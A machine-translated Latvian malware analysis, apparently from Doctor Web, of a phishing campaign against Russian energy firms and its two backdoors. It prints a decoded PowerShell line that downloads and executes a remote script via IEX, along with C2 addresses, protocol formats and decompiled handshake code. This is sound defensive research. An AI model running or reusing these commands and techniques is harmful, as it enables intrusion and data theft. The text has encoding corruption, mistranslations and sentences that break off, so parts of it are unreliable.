MÅ«su pieredze datoru droŔības incidentu izmeklÄÅ”anÄ liecina, ka e-pasts joprojÄm ir viens no visizplatÄ«tÄkajiem kanÄliem, ko uzbrucÄji izmanto, lai sÄkotnÄji iekļūtu uzbruktajÄs tÄ«kla infrastruktÅ«rÄs. Viena neuzmanÄ«ga rÄ«cÄ«ba ar aizdomÄ«gu (vai ne tik aizdomÄ«gu) vÄstuli kļūst par ieejas punktu tÄlÄkai inficÄÅ”anai, tÄpÄc kibernoziedznieki aktÄ«vi izmanto sociÄlÄs inženierijas metodes, lai gan ar mainÄ«gÄm sekmÄm.
Å ajÄ ierakstÄ mÄs vÄlamies runÄt par mÅ«su neseno izmeklÄÅ”anu saistÄ«bÄ ar surogÄtpasta kampaÅu, kuras mÄrÄ·auditorija ir vairÄki uzÅÄmumi Krievijas degvielas un enerÄ£ijas kompleksÄ. Visi uzbrukumi sekoja vienam un tam paÅ”am scenÄrijam, izmantojot viltus e-pastus, un Ŕķiet, ka neviens nav pielicis daudz pūļu Å”o e-pasta ziÅojumu teksta saturam.
IzlūkoŔanas dienests
Viss sÄkÄs 2020. gada aprīļa beigÄs, kad Doctor Web vÄ«rusu analÄ«tiÄ·i atklÄja surogÄtpasta kampaÅu, kurÄ hakeri vairÄku Krievijas degvielas un enerÄ£ijas kompleksa uzÅÄmumu darbiniekiem nosÅ«tÄ«ja atjauninÄtu tÄlruÅu katalogu. Protams, tas nebija vienkÄrÅ”s satraukums, jo direktorijs nebija Ä«sts, un .docx dokumenti lejupielÄdÄja divus attÄlus no attÄliem resursiem.
Viens no tiem tika lejupielÄdÄts lietotÄja datorÄ no ziÅu[.]zannews[.]com servera. ZÄ«mÄ«gi, ka domÄna vÄrds ir lÄ«dzÄ«gs KazahstÄnas pretkorupcijas mediju centra domÄnam zannews[.]kz. No otras puses, izmantotais domÄns nekavÄjoties atgÄdinÄja citu 2015. gada kampaÅu, kas pazÄ«stama ar nosaukumu TOPNEWS, kurÄ tika izmantotas ICEFOG aizmugures durvis un kuras nosaukumos bija Trojas kontroles domÄni ar apakÅ”virkni ānewsā. VÄl viena interesanta iezÄ«me bija tÄda, ka, sÅ«tot e-pastus dažÄdiem adresÄtiem, pieprasÄ«jumos lejupielÄdÄt attÄlu tika izmantoti vai nu dažÄdi pieprasÄ«juma parametri, vai unikÄli attÄlu nosaukumi.
MÄs uzskatÄm, ka tas tika darÄ«ts, lai savÄktu informÄciju, lai identificÄtu āuzticamuā adresÄtu, kurÅ” pÄc tam bÅ«tu garantÄts, ka vÄstuli atvÄrs Ä«stajÄ laikÄ. SMB protokols tika izmantots attÄla lejupielÄdei no otrÄ servera, ko varÄja izdarÄ«t, lai savÄktu NetNTLM jaucÄjus no to darbinieku datoriem, kuri atvÄra saÅemto dokumentu.
Un Å”eit ir pati vÄstule ar viltotu direktoriju:
Å Ä« gada jÅ«nijÄ hakeri attÄlu augÅ”upielÄdei sÄka izmantot jaunu domÄna nosaukumu sports[.]manhajnews[.]com. AnalÄ«ze parÄdÄ«ja, ka manhajnews[.]com apakÅ”domÄni surogÄtpasta sÅ«tÄ«jumos ir izmantoti vismaz kopÅ” 2019. gada septembra. Viens no Ŕīs kampaÅas mÄrÄ·iem bija liela Krievijas universitÄte.
TÄpat lÄ«dz jÅ«nijam uzbrukuma organizatori nÄca klajÄ ar jaunu tekstu savÄm vÄstulÄm: Å”oreiz dokumentÄ bija informÄcija par nozares attÄ«stÄ«bu. VÄstules teksts skaidri norÄdÄ«ja, ka tÄs autoram vai nu nav krievu valoda, vai arÄ« viÅÅ” apzinÄti rada Å”Ädu iespaidu par sevi. DiemžÄl nozares attÄ«stÄ«bas idejas, kÄ vienmÄr, izrÄdÄ«jÄs tikai vÄks - dokumentÄ atkal tika lejupielÄdÄti divi attÄli, savukÄrt serveris tika nomainÄ«ts uz download[.]inklingpaper[.]com.
NÄkamais jauninÄjums sekoja jÅ«lijÄ. MÄÄ£inot apiet pretvÄ«rusu programmu ļaunprÄtÄ«gu dokumentu atklÄÅ”anu, uzbrucÄji sÄka izmantot Microsoft Word dokumentus, kas Å”ifrÄti ar paroli. TajÄ paÅ”Ä laikÄ uzbrucÄji nolÄma izmantot klasisku sociÄlÄs inženierijas paÅÄmienu - atlÄ«dzÄ«bas paziÅojumu.
ApelÄcijas teksts atkal bija rakstÄ«ts tÄdÄ paÅ”Ä stilÄ, kas adresÄtÄ radÄ«ja papildu aizdomas. ArÄ« attÄla lejupielÄdes serveris nemainÄ«jÄs.
Å emiet vÄrÄ, ka visos gadÄ«jumos vÄstuļu sÅ«tÄ«Å”anai tika izmantotas elektroniskÄs pastkastÄ«tes, kas reÄ£istrÄtas mail[.]ru un yandex[.]ru domÄnos.
Uzbrukums
LÄ«dz 2020. gada septembra sÄkumam bija pienÄcis laiks rÄ«koties. MÅ«su vÄ«rusu analÄ«tiÄ·i reÄ£istrÄja jaunu uzbrukumu vilni, kurÄ uzbrucÄji atkal sÅ«tÄ«ja vÄstules, aizbildinoties ar tÄlruÅu kataloga atjauninÄÅ”anu. TomÄr Å”oreiz pielikumÄ bija ietverts ļaunprÄtÄ«gs makro.
Atverot pievienoto dokumentu, makro izveidoja divus failus:
- VBS skripts %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, kas bija paredzÄts pakeÅ”faila palaiÅ”anai;
- Pats sÄrijveida fails %APPDATA%configstest.bat, kas tika aptumÅ”ots.
TÄs darba bÅ«tÄ«ba ir saistÄ«ta ar Powershell apvalka palaiÅ”anu ar noteiktiem parametriem. Apvalkam nodotie parametri tiek dekodÄti komandÄs:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;
KÄ izriet no sniegtajÄm komandÄm, domÄns, no kura tiek lejupielÄdÄta lietderÄ«gÄ slodze, atkal tiek slÄpts kÄ ziÅu vietne. VienkÄrÅ”s
BackDoor.Siggen2.3238
Pirmais ir BackDoor.Siggen2.3238 ā mÅ«su speciÄlisti iepriekÅ” nebija saskÄruÅ”ies, un arÄ« citi antivÄ«rusu ražotÄji par Å”o programmu nebija pieminÄjuÅ”i.
Å Ä« programma ir aizmugures durvis, kas rakstÄ«tas C++ valodÄ un darbojas 32 bitu Windows operÄtÄjsistÄmÄs.
BackDoor.Siggen2.3238 spÄj sazinÄties ar pÄrvaldÄ«bas serveri, izmantojot divus protokolus: HTTP un HTTPS. PÄrbaudÄ«tajÄ paraugÄ tiek izmantots HTTPS protokols. PieprasÄ«jumos serverim tiek izmantots Å”Äds lietotÄja aÄ£ents:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Å ajÄ gadÄ«jumÄ visi pieprasÄ«jumi tiek piegÄdÄti ar Å”Ädu parametru kopu:
%s;type=%s;length=%s;realdata=%send
kur katra rinda %s ir attiecÄ«gi aizstÄta ar:
- inficÄtÄ datora ID,
- nosÅ«tÄ«tÄ pieprasÄ«juma veids,
- datu garums realdata laukÄ,
- datus.
InformÄcijas vÄkÅ”anas posmÄ par inficÄto sistÄmu aizmugures durvis Ä£enerÄ Å”Ädu rindu:
lan=%s;cmpname=%s;username=%s;version=%s;
kur lan ir inficÄtÄ datora IP adrese, cmpname ir datora nosaukums, lietotÄjvÄrds ir lietotÄjvÄrds, versija ir rinda 0.0.4.03.
Å Ä« informÄcija ar sysinfo identifikatoru tiek nosÅ«tÄ«ta ar POST pieprasÄ«jumu vadÄ«bas serverim, kas atrodas vietnÄ https[:]//31.214[.]157.14/log.txt. Ja atbildot BackDoor.Siggen2.3238 saÅem HEART signÄlu, savienojums tiek uzskatÄ«ts par veiksmÄ«gu, un aizmugures durvis sÄk galveno saziÅas ciklu ar serveri.
PilnÄ«gÄks darbÄ«bas principu apraksts BackDoor.Siggen2.3238 ir mÅ«su
BackDoor.Whitebird.23
OtrÄ programma ir BackDoor.Whitebird backdoor modifikÄcija, kas mums jau zinÄma no incidenta ar valsts aÄ£entÅ«ru KazahstÄnÄ. Å Ä« versija ir rakstÄ«ta C++ valodÄ un ir paredzÄta darbam gan 32 bitu, gan 64 bitu Windows operÄtÄjsistÄmÄs.
TÄpat kÄ lielÄkÄ daļa Å”Äda veida programmu, BackDoor.Whitebird.23 paredzÄti, lai izveidotu Å”ifrÄtu savienojumu ar vadÄ«bas serveri un nesankcionÄtu inficÄta datora kontroli. InstalÄts bojÄtÄ sistÄmÄ, izmantojot pilinÄtÄju
MÅ«su pÄrbaudÄ«tais paraugs bija ļaunprÄtÄ«ga bibliotÄka ar diviem eksportÄtiem failiem:
- Google Play
- PÄrbaude.
Sava darba sÄkumÄ tas atÅ”ifrÄ aizmugures durvju korpusÄ pievienoto konfigurÄciju, izmantojot algoritmu, kura pamatÄ ir XOR darbÄ«ba ar baitu 0x99. KonfigurÄcija izskatÄs Å”Ädi:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Lai nodroÅ”inÄtu pastÄvÄ«gu darbÄ«bu, aizmugurÄjÄs durvis maina laukÄ norÄdÄ«to vÄrtÄ«bu darba stundas konfigurÄcijas. LaukÄ ir 1440 baiti, kas Åem vÄrtÄ«bas 0 vai 1 un atspoguļo katru minÅ«ti no katras dienas stundas. Izveido atseviŔķu pavedienu katram tÄ«kla interfeisam, kas klausÄs interfeisu, un starpniekserverÄ« meklÄ autorizÄcijas paketes no inficÄtÄ datora. Kad Å”Äda pakete tiek noteikta, aizmugures durvis savam sarakstam pievieno informÄciju par starpniekserveri. TurklÄt, izmantojot WinAPI, tiek pÄrbaudÄ«ta starpniekservera klÄtbÅ«tne InternetQueryOptionW.
Programma pÄrbauda paÅ”reizÄjo minÅ«ti un stundu un salÄ«dzina to ar datiem laukÄ darba stundas konfigurÄcijas. Ja attiecÄ«gÄs dienas minÅ«tes vÄrtÄ«ba nav nulle, tiek izveidots savienojums ar vadÄ«bas serveri.
Izveidojot savienojumu ar serveri, tiek simulÄta savienojuma izveide starp klientu un serveri, izmantojot TLS versijas 1.0 protokolu. AizmugurÄjo durvju korpusÄ ir divi buferi.
PirmajÄ buferÄ« ir TLS 1.0 Client Hello pakete.
OtrajÄ buferÄ« ir TLS 1.0 klienta atslÄgu apmaiÅas paketes ar atslÄgas garumu 0x100 baiti, Change Cipher Spec, Encrypted Handshake Message.
NosÅ«tot Client Hello paketi, aizmugures durvis ieraksta 4 baitus paÅ”reizÄjÄ laika un 28 baitus pseidogadÄ«juma datu laukÄ Client Random, ko aprÄÄ·ina Å”Ädi:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
SaÅemtÄ pakete tiek nosÅ«tÄ«ta uz vadÄ«bas serveri. Atbilde (Server Hello pakete) pÄrbauda:
- atbilstība TLS protokola versijai 1.0;
- klienta norÄdÄ«tÄ laika zÄ«moga (lauka Random Data paketes pirmie 4 baiti) atbilstÄ«ba servera norÄdÄ«tajam laikspiedogam;
- pirmo 4 baitu sakritÄ«ba pÄc laika zÄ«moga klienta un servera Random Data laukÄ.
NorÄdÄ«to sakritÄ«bu gadÄ«jumÄ aizmugures durvis sagatavo klienta atslÄgu apmaiÅas paketi. Lai to izdarÄ«tu, tÄ modificÄ publisko atslÄgu klienta atslÄgu apmaiÅas pakotnÄ, kÄ arÄ« Å”ifrÄÅ”anas IV un Å”ifrÄÅ”anas datus pakotnÄ Encrypted Handshake Message.
PÄc tam aizmugures durvis saÅem paketi no komandu un vadÄ«bas servera, pÄrbauda, āāvai TLS protokola versija ir 1.0, un pÄc tam pieÅem vÄl 54 baitus (paketes pamattekstu). Tas pabeidz savienojuma iestatÄ«Å”anu.
PilnÄ«gÄks darbÄ«bas principu apraksts BackDoor.Whitebird.23 ir mÅ«su
SecinÄjums un secinÄjumi
Dokumentu, ļaunprÄtÄ«gas programmatÅ«ras un izmantotÄs infrastruktÅ«ras analÄ«ze ļauj ar pÄrliecÄ«bu teikt, ka uzbrukumu sagatavojusi viena no Ķīnas APT grupÄm. Å emot vÄrÄ aizmugures durvju funkcionalitÄti, kas tiek instalÄtas upuru datoros veiksmÄ«ga uzbrukuma gadÄ«jumÄ, inficÄÅ”anÄs noved pie vismaz konfidenciÄlas informÄcijas zÄdzÄ«bas no uzbrukuÅ”o organizÄciju datoriem.
TurklÄt ļoti iespÄjams scenÄrijs ir specializÄtu Trojas zirgu instalÄÅ”ana vietÄjos serveros ar Ä«paÅ”u funkciju. Tie varÄtu bÅ«t domÄna kontrolleri, pasta serveri, interneta vÄrtejas utt. KÄ redzams piemÄrÄ
Avots: www.habr.com